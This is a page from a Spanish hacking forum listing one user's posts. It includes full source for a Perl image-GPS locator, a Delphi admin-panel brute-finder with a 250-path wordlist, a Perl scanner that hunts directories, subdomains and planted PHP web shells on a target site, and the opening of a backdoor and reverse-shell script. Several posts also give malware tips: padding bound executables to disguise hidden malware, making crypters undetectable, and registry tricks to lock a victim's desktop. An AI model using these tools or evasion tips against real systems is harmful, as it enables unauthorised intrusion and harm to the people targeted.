Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - BigBear

Páginas: [1] 2 3 ... 28
1
Noticias Informáticas / Re:FBI Arresta al creador de Nanocore RAT
« en: Abril 05, 2017, 08:59:25 am »
Espero que no sea el mismo aeonhack que hizo los skins de C# que publique en este mismo foro.

2
Buen aporte, yo hice un generador de virus en Delphi y te puedo pasar algunas ideas, podes agregarle una opcion para volver loca la hora y el mouse con threads para que no deje de cambiarse, si sos perverso podes cambiarle el fondo y el screensaver por cosas desagradables y bloquearlas desde el registro de windows para que no pueda cambiarlas, bueno son muchas cosas, todo esta en la imaginación, la mala imaginación ...

3
Perl / Re:[Perl] DH Image Locate 0.3
« en: Marzo 31, 2017, 06:06:36 pm »
Ok, gracias por comentar Antrax.

Saludos.

4
Perl / [Perl] DH Image Locate 0.3
« en: Marzo 31, 2017, 04:25:50 pm »
Un script en Perl para localizar la coordenadas GPS de cualquier imagen que contenga este tag.

Si quieren el programa les redirige a google maps con las coordenadas encontradas.

El codigo :

Código: Perl
  1. #!usr/bin/perl
  2. # DH Image Locate 0.3
  3. #(C) Doddy Hackman 2016
  4.  
  5. use Image::ExifTool;
  6. use Getopt::Long;
  7. use Color::Output;
  8. Color::Output::Init;
  9.  
  10. GetOptions(
  11.     "dump_all=s"   => \$dump_all,
  12.     "dump_gps_tags=s"  => \$dump_gps_tags,
  13.     "locate=s"   => \$locate
  14. );
  15.  
  16. head();
  17.  
  18. if ($dump_all) {
  19.  
  20.     if ( -f $dump_all ) {
  21.         printear_titulo("<ul class="bbc_list"><li type="square"> Finding information in : ");[/li][/list]
  22.         print $dump_all. "\n\n";
  23.         dump_all($dump_all);
  24.     }
  25.     else {
  26.         printear("[-] File not found\n");
  27.     }
  28.  
  29. }
  30. elsif ($dump_gps_tags) {
  31.  
  32.     if ( -f $dump_gps_tags ) {
  33.         printear_titulo("</li><li type="square"> Finding GPS tags in : ");[/li][/list]
  34.         print $dump_gps_tags. "\n\n";
  35.         dump_gps_tags_and_locate($dump_gps_tags,"0");
  36.     }
  37.     else {
  38.         printear("[-] File not found\n");
  39.     }
  40. }
  41. elsif ($locate) {
  42.  
  43.     if ( -f $locate ) {
  44.         printear_titulo("</li><li type="square"> Scanning photo : ");[/li][/list]
  45.         print $locate. "\n\n";
  46.         dump_gps_tags_and_locate($locate,"1");
  47.     }
  48.     else {
  49.         printear("[-] File not found\n");
  50.     }
  51.  
  52. } else {
  53.     sintax();
  54. }
  55.  
  56. copyright();
  57.  
  58. # Functions
  59.  
  60. sub dump_all {
  61.  
  62.     my $imagen_target = $_[0];
  63.  
  64.     my $datos_imagen       = new Image::ExifTool;
  65.     my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
  66.  
  67.     for my $abriendo_imagen ( $datos_imagen->GetFoundTags("Group0") ) {
  68.         my $valor = $informacion_imagen->{$abriendo_imagen};
  69.         printear("</li><li type="square"> $abriendo_imagen : ");[/li][/list]
  70.         print $valor. "\n";
  71.     }
  72.  
  73. }
  74.  
  75. sub dump_gps_tags_and_locate {
  76.    
  77.    my $imagen_target = shift;
  78.    my $locate = shift;
  79.  
  80.    my $datos_imagen       = new Image::ExifTool;
  81.    my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
  82.  
  83.    my $latitud = $informacion_imagen->{GPSLatitude};
  84.    my $longitud = $informacion_imagen->{GPSLongitude};
  85.    my $altitud = $informacion_imagen->{GPSAltitude};
  86.    my $fecha = $informacion_imagen->{GPSDateTime};
  87.    my $posicion_real = $informacion_imagen->{GPSPosition};
  88.    
  89.    my $finder_ready = 0;
  90.    
  91.    
  92.    if($latitud ne "") {
  93.       printear("</li><li type="square"> Latitude : ");[/li][/list]
  94.       print $latitud. "\n";
  95.    } else {
  96.       printear("[-] Latitude : ");
  97.       print "Not Found". "\n";  
  98.    }
  99.    
  100.    if($longitud ne "") {
  101.       printear("</li><li type="square"> Longitude : ");[/li][/list]
  102.       print $longitud. "\n";
  103.    } else {
  104.       printear("[-] Longitude : ");
  105.       print "Not Found". "\n";
  106.    }
  107.    
  108.     if($latitud ne "") {
  109.       printear("</li><li type="square"> Altitude : ");[/li][/list]
  110.       print $altitud. "\n";
  111.    } else {
  112.       printear("[-] Altitude : ");
  113.       print "Not Found". "\n";
  114.    }
  115.    
  116.     if($fecha ne "") {
  117.       printear("</li><li type="square"> DateTime : ");[/li][/list]
  118.       print $fecha. "\n";
  119.    } else {
  120.       printear("[-] DateTime : ");
  121.       print "Not Found". "\n";
  122.    }
  123.    
  124.     if($posicion_real ne "") {
  125.       printear("</li><li type="square"> Position : ");[/li][/list]
  126.       print $posicion_real. "\n";
  127.       $finder_ready = 1;
  128.    } else {
  129.       printear("[-] Position : ");
  130.       print "Not Found". "\n";
  131.       $finder_ready = 0;
  132.    }
  133.    
  134.    if($locate eq "1") {
  135.       if($finder_ready eq "1") {
  136.          my $gps_split = $posicion_real;
  137.          $gps_split =~ s/deg//g;
  138.          $gps_split =~ s/'//g;
  139.          $gps_split =~ s/"//g;
  140.          $gps_split =~ s/W//g;
  141.          $gps_split =~ s/N,/-/g;
  142.          $gps_split =~ s/  / /g;
  143.                  
  144.          my $url = "[url]https://www.google.com.ar/maps/search/[/url]".$gps_split."/";
  145.          
  146.          printear_titulo("\n[!] Position Located\n\n");
  147.          printear("</li><li type="square"> GPS : ");[/li][/list]
  148.          print $gps_split."\n";
  149.          
  150.          printear("\n[?] Open in browser [y,n] : ");
  151.          chomp(my $rta = <STDIN>);
  152.          if($rta=~/y/ig) {
  153.             printear_titulo("\n</li><li type="square"> Enjoy the program !\n");[/li][/list]
  154.             system("start firefox \"" . $url."\"");
  155.          } else {
  156.             printear("\n</li><li type="square"> GoogleMaps : ");[/li][/list]
  157.             print $url. "\n";
  158.          }
  159.          
  160.       } else {
  161.          printear_titulo("\n[-] Position GPS not available");
  162.       }
  163.    }
  164.    
  165. }
  166.  
  167. # More Functions
  168.  
  169. sub printear {
  170.     cprint( "\x036" . $_[0] . "\x030" );
  171. }
  172.  
  173. sub printear_logo {
  174.     cprint( "\x037" . $_[0] . "\x030" );
  175. }
  176.  
  177. sub printear_titulo {
  178.     cprint( "\x0310" . $_[0] . "\x030" );
  179. }
  180.  
  181. sub sintax {
  182.  
  183.     printear("</li><li type="square"> Sintax : ");[/li][/list]
  184.     print "perl $0 <option> <value>\n";
  185.     printear("\n</li><li type="square"> Options : \n\n");[/li][/list]
  186.     print "-dump_all <image> : Get all information of a image\n";
  187.     print "-dump_gps <image> : Get all tags GPS of a image\n";
  188.     print "-locate <image> : Locate Image in GoogleMaps\n";
  189.     printear("\n</li><li type="square"> Example : ");[/li][/list]
  190.     print "perl dh_image_locate.pl -dump_all test.jpg\n";
  191.     copyright();
  192. }
  193.  
  194. sub head {
  195.     printear_logo("\n-- == DH Image Locate 0.3 == --\n\n\n");
  196. }
  197.  
  198. sub copyright {
  199.     printear_logo("\n\n-- == (C) Doddy Hackman 2016 == --\n\n");
  200.     exit(1);
  201. }
  202.  
  203. #The End ?
  204.  

Un video con ejemplos de uso :



Si quieren bajar el programa lo pueden hacer de aca :

SourceForge.
Github.

Eso seria todo.

5
Dudas y pedidos generales / Re:[SOLUCIONADO] crear una botnet
« en: Marzo 27, 2017, 10:43:50 pm »
me pueden conseguir el ircplus para poder practicarlo

No hace falta el IRC Plus para probar una IRC Botnet, podes crear un canal que no use nadie en un servidor cualquiera para poder practicar ...

6
Diseño Gráfico / Re:La bruja de Underc0de.org
« en: Marzo 27, 2017, 03:39:54 pm »
Si, yo preguntaba porque yo hacia animaciones basicas con Adobe Flash CS3, por eso la pregunta, me acuerdo que era todo un tema hacer fotograma por fotograma (en sentido literal) en las animaciones xD.

7
Diseño Gráfico / Re:La bruja de Underc0de.org
« en: Marzo 26, 2017, 09:24:05 pm »
Ok, entonces la clave es la misma que en el diseño web, la creatividad y otras cosas mas ...

8
Diseño Gráfico / Re:La bruja de Underc0de.org
« en: Marzo 26, 2017, 03:56:35 pm »
Esta buena, ¿ podrias decirme como lo hiciste ?, yo solo uso Photoshop ...

9
A mi no me molesta, mientras sea opcional como el dejar rastros gps en las fotos cuando usamos la camara del celular ...

10
Otros lenguajes / Re:[Cramel] File pumper | Agrega peso a tus archivos
« en: Marzo 23, 2017, 04:19:08 pm »
Gracias, aun no se me ocurre en que utilizarlo, pero lo tendre xD

Lo podes usar en un ejecutable bindeado para que tenga el peso original del programa que tratas de imitar cuando ocultas el malware.

Genial, aunque creo ya no sirven los crypters hoy en dia, o si?

ja , ese es todo un tema de debate deberias crear un tema con esa pregunta, yo solo hice uno en Delphi y no me gusto, me parecio una perdida de tiempo ya que no lo logre hacer FUD porque use un Runpe conocido.

11
Otros lenguajes / Re:[Cramel] File pumper | Agrega peso a tus archivos
« en: Marzo 23, 2017, 01:11:29 pm »
Gracias, aun no se me ocurre en que utilizarlo, pero lo tendre xD

Lo podes usar en un ejecutable bindeado para que tenga el peso original del programa que tratas de imitar cuando ocultas el malware.

12
Debates / Re:Tu entorno linux favorito
« en: Marzo 20, 2017, 11:14:18 am »
Siempre use Gnome en Ubuntu y en ese entonces me parecio suficiente cuando tunee todo el escritorio estilo matrix o tron.

13
Python / Re:Troyano IRC
« en: Marzo 17, 2017, 06:23:29 pm »
Si se trata de un troyano IRC y buscas ideas entonces revista la lista de funciones de mi IRC Botnet en Delphi : Project Spartacus 2.0 , tu trabajo seria traducir a Python las funciones que te gustan del proyecto.

Saludos.

14
Off Topic / Re:motivacion
« en: Marzo 08, 2017, 12:18:49 pm »
En mi caso siempre la programacion sobre temas como exploits y malware.

Saludos.

15
Delphi / [Delphi] Admin Finder 1.0
« en: Febrero 23, 2017, 05:46:31 pm »
Un programa para buscar el panel de administracion usando threads para ser mas rápido y cómodo al usuario.

Una imagen :



El codigo :

Código: Delphi
  1. // Admin Finder 1.0
  2. // (C) Doddy Hackman 2016
  3.  
  4. unit finder;
  5.  
  6. interface
  7.  
  8. uses
  9.   Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
  10.   System.Classes, Vcl.Graphics,
  11.   Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ExtCtrls, Vcl.StdCtrls,
  12.   Vcl.ComCtrls, idHTTP, OtlThreadPool, OtlComm, OtlTask,
  13.   OtlTaskControl, Vcl.Imaging.pngimage;
  14.  
  15. type
  16.   TFormHome = class(TForm)
  17.     imgLogo: TImage;
  18.     gbEnterConfiguration: TGroupBox;
  19.     lblPage: TLabel;
  20.     lblThreads: TLabel;
  21.     txtPage: TEdit;
  22.     txtThreads: TEdit;
  23.     udThreads: TUpDown;
  24.     gbConsole: TGroupBox;
  25.     mmOutput: TMemo;
  26.     btnStart: TButton;
  27.     btnStop: TButton;
  28.     status: TStatusBar;
  29.     procedure btnStopClick(Sender: TObject);
  30.     procedure btnStartClick(Sender: TObject);
  31.   private
  32.     { Private declarations }
  33.   public
  34.     { Public declarations }
  35.   end;
  36.  
  37. var
  38.   FormHome: TFormHome;
  39.  
  40. implementation
  41.  
  42. {$R *.dfm}
  43. // Functions
  44.  
  45. function message_box(title, message_text, type_message: string): string;
  46. begin
  47.   if not(title = '') and not(message_text = '') and not(type_message = '') then
  48.   begin
  49.     try
  50.       begin
  51.         if (type_message = 'Information') then
  52.         begin
  53.           MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
  54.             MB_ICONINFORMATION);
  55.         end
  56.         else if (type_message = 'Warning') then
  57.         begin
  58.           MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
  59.             MB_ICONWARNING);
  60.         end
  61.         else if (type_message = 'Question') then
  62.         begin
  63.           MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
  64.             MB_ICONQUESTION);
  65.         end
  66.         else if (type_message = 'Error') then
  67.         begin
  68.           MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
  69.             MB_ICONERROR);
  70.         end
  71.         else
  72.         begin
  73.           MessageBox(FormHome.Handle, PChar(message_text), PChar(title),
  74.             MB_ICONINFORMATION);
  75.         end;
  76.         Result := '<ul class="bbc_list"><li type="square"> MessageBox : OK';[/li][/list]
  77.       end;
  78.     except
  79.       begin
  80.         Result := '[-] Error';
  81.       end;
  82.     end;
  83.   end
  84.   else
  85.   begin
  86.     Result := '[-] Error';
  87.   end;
  88. end;
  89.  
  90. function check_page(page: string): boolean;
  91. var
  92.   nave: TIdHTTP;
  93. begin
  94.   try
  95.     begin
  96.       nave := TIdHTTP.Create(nil);
  97.       nave.Request.UserAgent :=
  98.         'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0';
  99.       nave.Get(page);
  100.       if nave.ResponseCode = 200 then
  101.       begin
  102.         Result := True;
  103.       end
  104.       else
  105.       begin
  106.         Result := False;
  107.       end;
  108.       nave.Free();
  109.     end;
  110.   except
  111.     begin
  112.       Result := False;
  113.     end;
  114.   end;
  115. end;
  116.  
  117. //
  118.  
  119. procedure TFormHome.btnStartClick(Sender: TObject);
  120. var
  121.   i: integer;
  122.   path: string;
  123. const
  124.   paths: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
  125.     'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
  126.     'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
  127.     'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
  128.     'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
  129.     'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
  130.     'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
  131.     'login/index.asp', 'login/index.aspx', 'login/login.asp',
  132.     'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
  133.     'administracion/index.asp', 'administracion/index.aspx',
  134.     'administracion/login.asp', 'administracion/login.aspx',
  135.     'administracion/webmaster.asp', 'administracion/webmaster.aspx',
  136.     'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
  137.     'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php',
  138.     'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php',
  139.     'administracion/', 'administracion/index.php', 'administracion/login.php',
  140.     'administracion/ingresar.php', 'administracion/admin.php',
  141.     'administration/', 'administration/index.php', 'administration/login.php',
  142.     'administrator/index.php', 'administrator/login.php',
  143.     'administrator/system.php', 'system/', 'system/login.php', 'admin.php',
  144.     'login.php', 'administrador.php', 'administration.php', 'administrator.php',
  145.     'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php',
  146.     'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/',
  147.     'admin/account.php', 'admin/account.html', 'admin/index.html',
  148.     'admin/login.html', 'admin/home.php', 'admin/controlpanel.html',
  149.     'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html',
  150.     'cp.php', 'cp.html', 'administrator/', 'administrator/index.html',
  151.     'administrator/login.html', 'administrator/account.html',
  152.     'administrator/account.php', 'administrator.html', 'login.html',
  153.     'modelsearch/login.php', 'moderator.php', 'moderator.html',
  154.     'moderator/login.php', 'moderator/login.html', 'moderator/admin.php',
  155.     'moderator/admin.html', 'moderator/', 'account.php', 'account.html',
  156.     'controlpanel/', 'controlpanel.php', 'controlpanel.html',
  157.     'admincontrol.php', 'admincontrol.html', 'adminpanel.php',
  158.     'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp',
  159.     'yonetici.asp', 'admin/account.asp', 'admin/home.asp',
  160.     'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
  161.     'administrator/index.asp', 'administrator/login.asp',
  162.     'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
  163.     'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
  164.     'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
  165.     'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
  166.     'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
  167.     'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
  168.     'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
  169.     'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
  170.     'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
  171.     'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
  172.     'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
  173.     'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
  174.     'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
  175.     'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
  176.     'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
  177.     'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
  178.     'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
  179.     'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
  180.     'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
  181.     'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
  182.     'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
  183.     'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
  184.     'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
  185.     'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/',
  186.     'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/',
  187.     'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/',
  188.     'admin4_colon/', 'radmind1/', 'SuperAdmin/', 'AdminTools/', 'cmsadmin/',
  189.     'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/',
  190.     'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/',
  191.     'database_administration/', 'power_user/', 'system_administration/',
  192.     'ss_vms_admin_sm/');
  193. begin
  194.   if not(txtPage.Text = '') and not(txtThreads.Text = '') then
  195.   begin
  196.     GlobalOmniThreadPool.MaxExecuting := StrToInt(txtThreads.Text) *
  197.       System.CPUCount;
  198.     status.Panels[0].Text := '</li><li type="square"> Scanning ...';[/li][/list]
  199.     FormHome.Update;
  200.     for i := Low(paths) to High(paths) do
  201.     begin
  202.       Application.ProcessMessages;
  203.       path := txtPage.Text + '/' + paths[i];
  204.       CreateTask(
  205.         procedure(const task: IOmniTask)
  206.         var
  207.           path_to_load: string;
  208.         begin
  209.  
  210.           path_to_load := task.Param['path'].AsString;
  211.  
  212.           status.Panels[0].Text := 'Checking : ' + path_to_load + ' ...';
  213.           FormHome.Update;
  214.           if (check_page(path_to_load)) then
  215.           begin
  216.             mmOutput.Lines.Add(path_to_load);
  217.           end;
  218.  
  219.         end).SetParameter('path', path).Unobserved.Schedule;
  220.  
  221.     end;
  222.  
  223.     while GlobalOmniThreadPool.CountExecuting +
  224.       GlobalOmniThreadPool.CountQueued > 0 do
  225.     begin
  226.       Application.ProcessMessages;
  227.     end;
  228.  
  229.     status.Panels[0].Text := '</li><li type="square"> Finished';[/li][/list]
  230.     FormHome.Update;
  231.  
  232.     message_box('Admin Finder 1.0', 'Scan Finished', 'Information');
  233.  
  234.   end
  235.   else
  236.   begin
  237.     message_box('Admin Finder 1.0', 'Complete the configuration', 'Warning');
  238.   end;
  239. end;
  240.  
  241. procedure TFormHome.btnStopClick(Sender: TObject);
  242. begin
  243.   GlobalOmniThreadPool.CancelAll;
  244.   status.Panels[0].Text := '</li><li type="square"> Stopped';[/li][/list]
  245.   FormHome.Update;
  246.   message_box('Admin Finder 1.0', 'Scan Stopped', 'Information');
  247. end;
  248.  
  249. end.
  250.  
  251. // The End ?
  252.  

Si quieren bajar el programa y el proyecto con el codigo fuente lo pueden hacer desde aca :

SourceForge.

Eso seria todo.

16
Java / Re:[Java] BotIrc
« en: Febrero 10, 2017, 05:46:46 pm »
Que onda Moy , los colores del programa me dan nostalgia a un antiguo programa Tk en Perl que hice , la idea esta buena , deberia aplicar la idea en Delphi pero no tengo tiempo xD.

Gracias por el aporte.

Saludos.

17
Delphi / [Delphi] DH SAMP Cheater 0.4
« en: Febrero 09, 2017, 08:41:15 pm »
Un programa que hice en Delphi para automatizar los comandos cuando juego al GTA San Andreas Online (SAMP) , esta hecho exclusivamente para el servidor UIF.

Simplemente usan el atajo de teclado cuando esten jugando y el comando se ejecutara.

Una imagen :



Si quieren bajar el programa lo pueden hacer de aca :

SourceForge.

Eso seria todo.

18
Perl / Re:[Perl] DH Secret Finder 0.8
« en: Febrero 09, 2017, 08:40:05 pm »
ok , gracias por comentar JETY.

19
Perl / [Perl] DH Secret Finder 0.8
« en: Enero 22, 2017, 09:36:42 am »
Un script en Perl que sirve como buscador de archivos web , tiene las siguientes opciones :

  • Buscar panel de administracion[/li]
  • Buscar dominios[/li]
  • Buscar directorios importantes[/li]
  • Buscar archivos importantes[/li]
  • Buscar PHP Shells[/li]
  • Guardar todo en logs[/li][/list]

    El codigo :

    Código: Perl
    1. # !usr/bin/perl
    2. # DH Secret Finder 0.8
    3. # (C) Doddy Hackman 2016
    4. # Credits for the arrays :
    5. # Dirs : directory-list-2.3-small.txt - Copyright 2007 James Fisher
    6. # Files : Based in wfuzz-1.4
    7. # Link for Files : [url]https://raw.githubusercontent.com/tuwid/darkc0de-old-stuff/master/wfuzz-1.4/wordlists/common.txt[/url]
    8. # Shells : Based in [url]https://github.com/bhavyanshu/Shell-Finder[/url]
    9.  
    10. use LWP::UserAgent;
    11. use Getopt::Long;
    12. use Color::Output;
    13. Color::Output::Init;
    14.  
    15. GetOptions(
    16.    "panels"   => \$panels,
    17.    "domains"   => \$domains,
    18.     "dirs"  => \$dirs,
    19.     "files"   => \$files,
    20.     "shells"   => \$shells,
    21.    "url=s"   => \$url,
    22.     "savefile=s"  => \$savefile,
    23.     "verbose"  => \$verbose
    24. );
    25.  
    26. head();
    27.  
    28. if ($panels) {
    29.    if($panels && $url) {
    30.       search($url,"panel");
    31.    } else {
    32.       sintax();
    33.    }  
    34. }
    35. elsif ($domains) {
    36.    if($domains && $url) {
    37.       search($url,"domain");
    38.    } else {
    39.       sintax();
    40.    }
    41. }
    42. elsif ($dirs) {
    43.    if($dirs && $url) {
    44.       search($url,"dir");
    45.    } else {
    46.       sintax();
    47.    }
    48. }
    49. elsif ($files) {
    50.    if($files && $url) {
    51.       search($url,"file");
    52.    } else {
    53.       sintax();
    54.    }
    55. }
    56. elsif ($shells) {
    57.    if($shells && $url) {
    58.       search($url,"shell");
    59.    } else {
    60.       sintax();
    61.    }
    62. }
    63. else {
    64.     sintax();
    65. }
    66.  
    67. copyright();
    68.  
    69. # Functions
    70.  
    71. sub search {
    72.    my ($url,$type) = @_;
    73.    
    74.    my $wordlist = "";
    75.    my $name = "";
    76.    
    77.    if($type eq "panel") {
    78.       $wordlist = "wordlists/panels.txt";
    79.       $name = "Panels";
    80.    } elsif($type eq "domain") {
    81.       $wordlist = "wordlists/domains.txt";
    82.       $name = "Domains";
    83.    } elsif($type eq "dir") {
    84.       $wordlist = "wordlists/directories.txt";
    85.       $name = "Directories";
    86.    } elsif($type eq "file") {
    87.       $wordlist = "wordlists/files.txt";
    88.       $name = "Files";
    89.    } elsif($type eq "shell") {
    90.       $wordlist = "wordlists/shells.txt";
    91.       $name = "Shells";
    92.    } else {
    93.       $wordlist = "wordlists/panels.txt";
    94.       $name = "Panels";
    95.    }
    96.    
    97.    my $cantidad = 0;
    98.    
    99.    if(-f $wordlist) {
    100.       printear_titulo("</li><li type="square"> Loading Wordlist ...\n");[/li][/list]
    101.       my @wordlist = load_wordlist($wordlist);
    102.       printear("\n</li><li type="square"> Wordlist Loaded : ");[/li][/list]
    103.       print int(@wordlist)." lines\n";
    104.       printear_logo("\n</li><li type="square"> Searching $name in $url ...\n\n");[/li][/list]
    105.       for my $line(@wordlist) {
    106.          chomp $line;
    107.          my $link = "";
    108.          if($type eq "domain") {
    109.             $link = $line.".".$url;
    110.          } else {
    111.             $link = $url."/".$line;
    112.          }
    113.          if(check_page($link)) {
    114.             if($verbose) {
    115.                printear("</li><li type="square"> Checking ");[/li][/list]
    116.                printear_logo("$link : ");
    117.                printear_azul("OK\n");
    118.             } else {
    119.                printear_azul("</li><li type="square"> Link : $link\n");[/li][/list]
    120.             }
    121.             $cantidad++;
    122.             if($savefile) {
    123.                savefile($savefile,"</li><li type="square"> Link : $link");[/li][/list]
    124.             }
    125.          } else {
    126.             if($verbose) {
    127.                printear("</li><li type="square"> Checking ");[/li][/list]
    128.                printear_logo("$link : ");
    129.                printear_rojo("FAIL\n");
    130.             }
    131.          }
    132.       }
    133.       printear("\n</li><li type="square"> $name Found : ");[/li][/list]
    134.       print "$cantidad\n";
    135.       if($cantidad eq "0") {
    136.          printear("\n[-] $name not found\n");
    137.       }
    138.       if($savefile) {
    139.          printear_logo("\n</li><li type="square"> Logs $savefile saved\n");[/li][/list]
    140.       }
    141.       printear_titulo("\n</li><li type="square"> Finished\n");[/li][/list]
    142.    } else {
    143.       printear_rojo("\n[-] Wordlist not exists");
    144.    }
    145. }
    146.  
    147. # More Functions
    148.  
    149. sub check_page {
    150.    my $url = shift;
    151.    my $nave = LWP::UserAgent->new(ssl_opts => {verify_hostname => 0,SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE});
    152.    $nave->agent("Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
    153.    $nave->timeout(10);  
    154.    my $code = $nave->get($url);
    155.    if ($code->is_success) {
    156.       return 1;
    157.    } else {
    158.       return 0;
    159.    }
    160. }
    161.  
    162. sub load_wordlist {
    163.     my @result;
    164.     my @words;
    165.     open( FILE, $_[0] );
    166.     @words = <FILE>;
    167.     close FILE;
    168.     for (@words) {
    169.         push( @result, $_ );
    170.     }
    171.     return (@result);
    172. }
    173.  
    174. sub savefile {
    175.    my ($filename,$text) = @_;
    176.    open( SAVE, ">>" . $filename );
    177.    print SAVE $text . "\n";
    178.    close SAVE;
    179. }
    180.  
    181. sub printear {
    182.     cprint( "\x036" . $_[0] . "\x030" );
    183. }
    184.  
    185. sub printear_logo {
    186.     cprint( "\x037" . $_[0] . "\x030" );
    187. }
    188.  
    189. sub printear_titulo {
    190.     cprint( "\x0310" . $_[0] . "\x030" );
    191. }
    192.  
    193. sub printear_rojo {
    194.     cprint( "\x035" . $_[0] . "\x030" );
    195. }
    196.  
    197. sub printear_azul {
    198.     cprint( "\x033" . $_[0] . "\x030" );
    199. }
    200.  
    201. sub sintax {
    202.     printear("</li><li type="square"> Sintax : ");[/li][/list]
    203.     print "perl $0 <option> <value>\n";
    204.     printear("\n</li><li type="square"> Options : \n\n");[/li][/list]
    205.     print "-panel -url <url> : Find panel administration in the URL\n";
    206.     print "-domain -url <url> : Find domains in the URL\n";
    207.     print "-dirs -url <url> : Find directories in the URL\n";
    208.     print "-files -url <url> : Find files in the URL\n";
    209.    print "-shells -url <url> : Find shells in the URL\n";
    210.    print "-savefile <filename> : Save results\n";
    211.     printear("\n</li><li type="square"> Example : ");[/li][/list]
    212.     print "perl secret_finder.pl -shells [url]http://localhost/[/url] -savefile results.txt\n";
    213.     copyright();
    214. }
    215.  
    216. sub head {
    217.     printear_logo("\n-- == DH Secret Finder 0.8 == --\n\n\n");
    218. }
    219.  
    220. sub copyright {
    221.     printear_logo("\n\n-- == (C) Doddy Hackman 2016 == --\n\n");
    222.     exit(1);
    223. }
    224.  
    225. #The End ?
    226.  

    Si quieren bajar el programa lo pueden hacer de aca :

    SourceForge.
    Github.

    Eso seria todo.

20
Perl / [Perl] Heaven Door 1.0
« en: Enero 20, 2017, 09:14:38 am »
Un script en Perl que funciona como backdoor con las siguientes opciones :

  • Backdoor[/li]
  • Reverse Shell[/li]
  • Generar backdoor PHP[/li]
  • Conectar con backdoor PHP[/li][/list]

    El codigo :

    Código: Perl
    1. # !usr/bin/perl
    2. # Heaven Door 1.0
    3. # (C) Doddy Hackman 2016
    4.  
    5. use LWP::UserAgent;
    6. use MIME::Base64;
    7. use IO::Socket;
    8. use IO::Socket::SSL;
    9. use Cwd;
    10. use Getopt::Long;
    11. use Color::Output;
    12. Color::Output::Init;
    13.  
    14. GetOptions(
    15.    "backdoor"   => \$backdoor,
    16.    "reverse"   => \$reverse,
    17.    "ip=s"   => \$ip,
    18.     "port=s"   => \$port,
    19.     "generate_backdoor"  => \$generate_backdoor,
    20.     "filename=s"  => \$filename,
    21.     "connect_backdoor"   => \$connect_backdoor,
    22.     "url=s"   => \$url
    23. );
    24.  
    25. head();
    26.  
    27. if ($backdoor) {
    28.    if($backdoor && $port) {
    29.       backdoor($port);
    30.    } else {
    31.       sintax();
    32.    }  
    33. }
    34. elsif ($reverse) {
    35.    if($reverse && $ip && $port) {
    36.       reverse_shell($ip,$port);
    37.    } else {
    38.       sintax();
    39.    }
    40. }
    41. elsif ($generate_backdoor) {
    42.    if($filename) {
    43.       cargar_generador_backdoor($filename);
    44.    } else {
    45.       sintax();
    46.    }
    47. }
    48. elsif ($connect_backdoor) {
    49.    if($url) {
    50.       cargar_consola_backdoor($url);
    51.    } else {
    52.       sintax();
    53.    }
    54. }
    55. else {
    56.     sintax();
    57. }
    58.  
    59. copyright();
